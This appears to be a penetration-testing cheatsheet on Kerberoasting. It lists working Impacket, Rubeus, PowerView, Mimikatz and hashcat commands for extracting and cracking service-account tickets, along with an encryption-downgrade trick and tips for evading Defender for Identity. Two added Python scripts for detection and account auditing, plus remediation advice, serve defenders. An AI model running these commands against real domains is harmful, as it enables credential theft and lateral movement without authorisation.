## 🛡️ Methodology Checklist

- Identify SPN accounts: `Get-DomainUser -SPN` or `impacket-GetUserSPNs [DOMAIN]/[USER]:[PASS] -dc-ip [DC_IP]`
- Request TGS tickets: `-request` flag with GetUserSPNs
- From Windows (Rubeus): `Rubeus.exe kerberoast /outfile:hashes.txt /nowrap`
- Crack: `hashcat -m 13100 hashes.txt [wordlist]`
- Check cracked accounts for admin group membership
- Use cracked credentials for further enumeration or lateral movement
- Document Kerberoastable accounts and cracked passwords in the report
## 🎯 Operational Context

Use when: Any domain user credentials are available → request TGS tickets for service accounts and crack them offline for plaintext passwords.

Think Dumber First: `impacket-GetUserSPNs [DOMAIN]/[USER]:[PASS] -dc-ip [DC] -request -outputfile kerberoast.hashes` → 30 seconds. Every service account with an SPN is a Kerberoasting target. Weak service account passwords crack in minutes.

Skip when: All service accounts use gMSA (Group Managed Service Accounts) → gMSA passwords are 240-char random and uncrackable.
## ⚡ Tactical Cheatsheet

| Command | Tactical Outcome |
|---|---|
| `GetUserSPNs.py -dc-ip [DC_IP] [DOMAIN]/[USER]` | Enumerate all SPN accounts (Kerberoastable targets) |
| `GetUserSPNs.py -dc-ip [DC_IP] [DOMAIN]/[USER] -request-user [SPN_ACCOUNT] -outputfile spn_hash.txt` | Request TGS for a specific account, save in Hashcat format |
| `GetUserSPNs.py -dc-ip [DC_IP] [DOMAIN]/[USER] -request -outputfile all_spn_hashes.txt` | Request TGS for ALL SPN accounts (noisy) |
| `hashcat -m 13100 spn_hash.txt /usr/share/wordlists/rockyou.txt` | Crack RC4 TGS ticket (etype 23) |
| `hashcat -m 19700 spn_hash.txt /usr/share/wordlists/rockyou.txt` | Crack AES-256 TGS ticket (etype 18) |
| `sudo nxc smb [DC_IP] -u [SPN_ACCOUNT] -p '[CRACKED_PASS]'` | Validate cracked SPN credentials |
| `.\Rubeus.exe kerberoast /stats` | Enumerate SPN accounts + encryption type stats |
| `.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap` | Roast only privileged accounts (admincount=1) |
| `.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap /tgtdeleg` | Downgrade AES accounts to RC4 for faster cracking |
| `Get-DomainUser * -spn \| select samaccountname` | PowerView: list all SPN accounts |
| `Get-DomainUser -Identity [USER] \| Get-DomainSPNTicket -Format Hashcat` | PowerView: extract TGS in Hashcat format |
| `mimikatz # base64 /out:true` | Set Mimikatz to output tickets as Base64 |
| `mimikatz # kerberos::list /export` | Export all cached tickets |
| `echo "[BASE64]" \| tr -d \\n \| base64 -d > target.kirbi` | Decode Base64 ticket to a kirbi file |
| `python2.7 kirbi2john.py target.kirbi` | Convert kirbi to John/Hashcat format |
| `sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > final_hash.txt` | Fix kirbi2john output formatting for Hashcat |
## 🔬 Deep Dive & Workflow

### How Kerberoasting Works

Any authenticated domain user can request a service ticket (TGS) for any account that has an SPN set. The ticket inside the TGS-REP is encrypted with a key derived from the service account's password (its NTLM hash for RC4 tickets), so the ticket can be extracted and cracked offline. No elevated privileges are required to request it.

Target profile: SPN accounts are often highly privileged (local admin, even Domain Admin) and frequently have weak passwords (matching the username, seasonal patterns). Even without admin rights elsewhere, a cracked MSSQL SPN usually means sysadmin on that database.

Reporting caveat: If tickets are extracted but cannot be cracked because the passwords are strong, still report the finding; downgrade the severity to Medium if a strong password policy mitigates it.
### Linux Attack Path (Impacket)

```shell
# 1. Enumerate Kerberoastable accounts; review the MemberOf column for high-value targets
GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend
# 2. Request a ticket for a specific target (preferred: targeted = stealthy)
GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request-user sqldev -outputfile sqldev_hash.txt
# 3. Crack
hashcat -m 13100 sqldev_hash.txt /usr/share/wordlists/rockyou.txt
# 4. Validate
sudo nxc smb 172.16.5.5 -u sqldev -p 'database!'
```

Warning: `-request` without `-request-user` dumps tickets for every SPN account. Extremely noisy; avoid in monitored environments.
### Windows Attack Path: Rubeus

```powershell
# Survey: how many targets? what encryption types?
.\Rubeus.exe kerberoast /stats
# Targeted: only admincount=1 accounts (privilege tier)
# /nowrap prevents Base64 corruption from console line-wrapping
.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap
# Downgrade AES -> RC4 for faster cracking
.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap /tgtdeleg
```

Downgrade limit: `/tgtdeleg` does NOT work against Windows Server 2019+ DCs; they enforce the highest supported encryption type.
### Windows Attack Path: PowerView (When Rubeus Is Blocked)

```powershell
Import-Module .\PowerView.ps1
Get-DomainUser * -spn | select samaccountname
Get-DomainUser -Identity sqldev | Get-DomainSPNTicket -Format Hashcat
```

### Manual Route: Mimikatz + kirbi2john

```powershell
# Request ticket into memory
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DEV-PRE-SQL.inlanefreight.local:1433"
# Extract with Mimikatz
mimikatz # base64 /out:true
mimikatz # kerberos::list /export
```

On the Linux attack host:

```shell
echo "[BASE64_BLOB]" | tr -d \\n | base64 -d > target.kirbi
python2.7 kirbi2john.py target.kirbi
sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > final_hash.txt
hashcat -m 13100 final_hash.txt /usr/share/wordlists/rockyou.txt
```

### Encryption Type Quick Reference
| Mode | Type | Notes |
|---|---|---|
| 13100 | RC4 (etype 23) | Default, fastest to crack |
| 19700 | AES-256 (etype 18) | Slower; try /tgtdeleg downgrade first |
### Detection

Event ID 4769 (A Kerberos service ticket was requested) with Ticket Encryption Type 0x17 (RC4-HMAC) is the classic indicator: a current domain should be issuing AES tickets (0x11 / 0x12), so RC4 service tickets for user accounts stand out. Defenders baseline 4769 volume and alert on anomalous spikes from a single requesting account, in particular many distinct service names in a short window. Targeted requests (`-request-user`) generate far less noise than bulk dumps.
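As an added example (not from the original cheatsheet), the script below applies the two detection signals above to a handful of constructed Event ID 4769 records: RC4 (0x17) service tickets issued for user-type service accounts, and one requester collecting many distinct service names inside a short window. Field names follow the 4769 EventData schema; the window and threshold values are assumptions, and the events are made up.

```python
"""Triage constructed Event ID 4769 records for Kerberoasting indicators.
Sample events are constructed, not real logs."""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17          # TicketEncryptionType for etype 23
TGT_SERVICE = "krbtgt"   # TGT operations, not service tickets

# Constructed sample events. TargetUserName = requesting account,
# ServiceName = SPN owner whose ticket was issued.
SAMPLE_EVENTS = [
    {"time": "2024-05-01T09:00:01", "TargetUserName": "forend@INLANEFREIGHT.LOCAL",
     "ServiceName": "sqldev", "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"time": "2024-05-01T09:00:02", "TargetUserName": "forend@INLANEFREIGHT.LOCAL",
     "ServiceName": "svc_backup", "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"time": "2024-05-01T09:00:02", "TargetUserName": "forend@INLANEFREIGHT.LOCAL",
     "ServiceName": "svc_web", "TicketEncryptionType": "0x12", "Status": "0x0"},
    {"time": "2024-05-01T09:00:03", "TargetUserName": "forend@INLANEFREIGHT.LOCAL",
     "ServiceName": "svc_sql2", "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"time": "2024-05-01T09:00:03", "TargetUserName": "forend@INLANEFREIGHT.LOCAL",
     "ServiceName": "svc_mon", "TicketEncryptionType": "0x12", "Status": "0x0"},
    {"time": "2024-05-01T09:00:04", "TargetUserName": "forend@INLANEFREIGHT.LOCAL",
     "ServiceName": "svc_ldap", "TicketEncryptionType": "0x12", "Status": "0x0"},
    {"time": "2024-05-01T09:00:05", "TargetUserName": "forend@INLANEFREIGHT.LOCAL",
     "ServiceName": "DC01$", "TicketEncryptionType": "0x12", "Status": "0x0"},
    {"time": "2024-05-01T09:05:00", "TargetUserName": "jdoe@INLANEFREIGHT.LOCAL",
     "ServiceName": "FS01$", "TicketEncryptionType": "0x12", "Status": "0x0"},
    {"time": "2024-05-01T09:06:00", "TargetUserName": "jdoe@INLANEFREIGHT.LOCAL",
     "ServiceName": "krbtgt", "TicketEncryptionType": "0x12", "Status": "0x0"},
    {"time": "2024-05-01T10:30:00", "TargetUserName": "jdoe@INLANEFREIGHT.LOCAL",
     "ServiceName": "svc_print", "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"time": "2024-05-01T11:00:00", "TargetUserName": "amiller@INLANEFREIGHT.LOCAL",
     "ServiceName": "svc_print", "TicketEncryptionType": "0x17", "Status": "0x1b"},
]


def _is_service_ticket(event):
    """Successful ticket for a user-type service account: skip failures,
    computer accounts (trailing '$') and the krbtgt TGT service."""
    svc = event["ServiceName"]
    return (event["Status"] == "0x0"
            and not svc.endswith("$")
            and svc.lower() != TGT_SERVICE)


def find_rc4_requests(events):
    """(requester, service) pairs whose ticket was issued with RC4 (0x17)."""
    return [(e["TargetUserName"], e["ServiceName"]) for e in events
            if _is_service_ticket(e)
            and int(e["TicketEncryptionType"], 16) == RC4_HMAC]


def find_bulk_requesters(events, window_minutes=5, threshold=5):
    """Requesters that asked for >= threshold distinct service accounts
    within any sliding window of window_minutes (assumed thresholds)."""
    by_user = defaultdict(list)
    for e in events:
        if _is_service_ticket(e):
            by_user[e["TargetUserName"]].append(
                (datetime.fromisoformat(e["time"]), e["ServiceName"]))
    window = timedelta(minutes=window_minutes)
    flagged = {}
    for user, reqs in by_user.items():
        reqs.sort()
        peak, start = 0, 0
        for end in range(len(reqs)):
            while reqs[end][0] - reqs[start][0] > window:
                start += 1
            peak = max(peak, len({svc for _, svc in reqs[start:end + 1]}))
        if peak >= threshold:
            flagged[user] = peak
    return flagged


if __name__ == "__main__":
    for who, svc in find_rc4_requests(SAMPLE_EVENTS):
        print(f"RC4 service ticket: {who} -> {svc}")
    for who, n in find_bulk_requesters(SAMPLE_EVENTS).items():
        print(f"Bulk pattern: {who} requested {n} distinct services within 5 min")
```

On the constructed data `forend` trips the bulk rule (six distinct service accounts in a few seconds, the `-request` pattern) while `jdoe`'s single RC4 ticket for `svc_print` only appears in the RC4 list, which is the difference in noise between a bulk dump and a `-request-user` request. Computer accounts and `krbtgt` are excluded because they dominate normal 4769 volume and are not Kerberoast targets.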
## 🛠️ Troubleshooting & Edge Cases

| Problem | Cause | Fix |
|---|---|---|
| GetUserSPNs returns no SPNs | No service accounts with SPNs | Confirm via LDAP: `ldapsearch -x ... '(&(objectClass=user)(servicePrincipalName=*))'` |
| TGS request returns KDC_ERR_S_PRINCIPAL_UNKNOWN | SPN deleted or object moved | SPN exists in BloodHound but the account was moved or renamed; re-enumerate current SPNs |
| hashcat mode 13100 rejects the hash or cracking is too slow | AES-256 Kerberoast hash (`$krb5tgs$18$`) | Check the hash prefix: `$krb5tgs$23$` = RC4 (mode 13100), `$krb5tgs$18$` = AES-256 (mode 19700); see the Encryption Type Quick Reference. RC4 cracks far faster, so re-request with `-request-user [SVC] -dc-ip [DC]` or `/tgtdeleg` where the DC still issues RC4 |
| Cracking fails: password too strong | Service account with a 20+ char random password | Move to the next target; some orgs use LAPS-like randomization for service accounts |
| Kerberoasting detected by MDI | MDI monitors TGS requests | Use the nxc module, which limits requests, or target specific accounts instead of bulk-requesting all |
## 📋 Reporting Trigger

Finding Title: Kerberoastable Service Account Password Cracked

Impact: Service account TGS ticket cracking recovers the service account's plaintext password offline without authentication failures, providing credentials for lateral movement or privilege escalation depending on the service account's AD permissions.

Root Cause: Service account using a weak, human-memorable password instead of a long random managed password. No detection of bulk TGS requests.

Recommendation: Implement Group Managed Service Accounts (gMSA) for all service accounts to enforce automatic 240-character random password rotation. Alert on bulk TGS requests via Microsoft Defender for Identity. Audit all SPN-bearing accounts for excessive AD permissions.
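As an added example (not part of the original cheatsheet), the audit below turns the Recommendation and the "Skip when gMSA" rule into a check a defender can run over a directory export: every SPN-bearing account that is not a gMSA is flagged if RC4 tickets are still permitted, if it carries `adminCount=1`, if it sits in a privileged group, or if its password has not been rotated. The attribute names (`objectClass`, `servicePrincipalName`, `adminCount`, `msDS-SupportedEncryptionTypes`, `pwdLastSet`, `memberOf`) are the real AD ones; the account records are constructed, and the password-age threshold and the group list are assumptions.

```python
"""Audit SPN-bearing accounts for Kerberoasting exposure.
Records are constructed stand-ins for an LDAP export."""
from datetime import datetime

GMSA_CLASS = "msDS-GroupManagedServiceAccount"
RC4_HMAC_BIT = 0x4            # msDS-SupportedEncryptionTypes flag for RC4-HMAC
MAX_PASSWORD_AGE_DAYS = 365   # assumed threshold for a never-rotated human password
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators"}  # assumed list

# Constructed sample export (dates are ISO strings for readability).
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "sqldev", "objectClass": ["user"],
     "servicePrincipalName": ["MSSQLSvc/DEV-PRE-SQL.inlanefreight.local:1433"],
     "adminCount": 1, "msDS-SupportedEncryptionTypes": 0,
     "pwdLastSet": "2019-03-12", "memberOf": ["Domain Admins"]},
    {"sAMAccountName": "svc_web", "objectClass": ["user"],
     "servicePrincipalName": ["HTTP/web01.inlanefreight.local"],
     "adminCount": 0, "msDS-SupportedEncryptionTypes": 0x18,   # AES128 | AES256 only
     "pwdLastSet": "2024-02-01", "memberOf": []},
    {"sAMAccountName": "gmsa_backup$",
     "objectClass": ["user", "computer", GMSA_CLASS],
     "servicePrincipalName": ["backup/bk01.inlanefreight.local"],
     "adminCount": 0, "msDS-SupportedEncryptionTypes": 0x18,
     "pwdLastSet": "2024-04-20", "memberOf": []},
    {"sAMAccountName": "svc_print", "objectClass": ["user"],
     "servicePrincipalName": ["print/prt01.inlanefreight.local"],
     "adminCount": 0, "msDS-SupportedEncryptionTypes": 0x1c,   # RC4 | AES128 | AES256
     "pwdLastSet": "2023-08-01", "memberOf": []},
    {"sAMAccountName": "jdoe", "objectClass": ["user"],           # no SPN: not roastable
     "servicePrincipalName": [], "adminCount": 0,
     "msDS-SupportedEncryptionTypes": 0, "pwdLastSet": "2020-01-01", "memberOf": []},
]


def rc4_allowed(account):
    """RC4 service tickets are issued when the attribute is unset/0 (the DC
    default for user accounts) or when the RC4 bit is set."""
    etypes = account.get("msDS-SupportedEncryptionTypes") or 0
    return etypes == 0 or bool(etypes & RC4_HMAC_BIT)


def audit_account(account, today):
    """Return the list of issue tags for one SPN-bearing account."""
    if GMSA_CLASS in account.get("objectClass", []):
        return []                      # managed 240-char password: not crackable
    issues = []
    if rc4_allowed(account):
        issues.append("rc4-tickets-allowed")
    if account.get("adminCount") == 1:
        issues.append("admincount-1")
    privileged = PRIVILEGED_GROUPS & set(account.get("memberOf", []))
    if privileged:
        issues.append("member-of:" + ",".join(sorted(privileged)))
    age_days = (today - datetime.fromisoformat(account["pwdLastSet"])).days
    if age_days > MAX_PASSWORD_AGE_DAYS:
        issues.append(f"password-age-{age_days}d")
    return issues


def audit(accounts, today_iso):
    """Map sAMAccountName -> issues for every SPN-bearing account with findings."""
    today = datetime.fromisoformat(today_iso)
    report = {}
    for acct in accounts:
        if not acct.get("servicePrincipalName"):
            continue                   # no SPN, no TGS to request
        issues = audit_account(acct, today)
        if issues:
            report[acct["sAMAccountName"]] = issues
    return report


if __name__ == "__main__":
    for name, issues in audit(SAMPLE_ACCOUNTS, "2024-05-01").items():
        print(f"{name}: {', '.join(issues)}")
```

Accounts that come back clean are either gMSAs or AES-only accounts with recently rotated passwords, which is the end state the Recommendation asks for; `sqldev` shows the worst case (RC4 permitted, `adminCount=1`, Domain Admins member, stale password) and would be the first account to migrate to a gMSA or to a long random password.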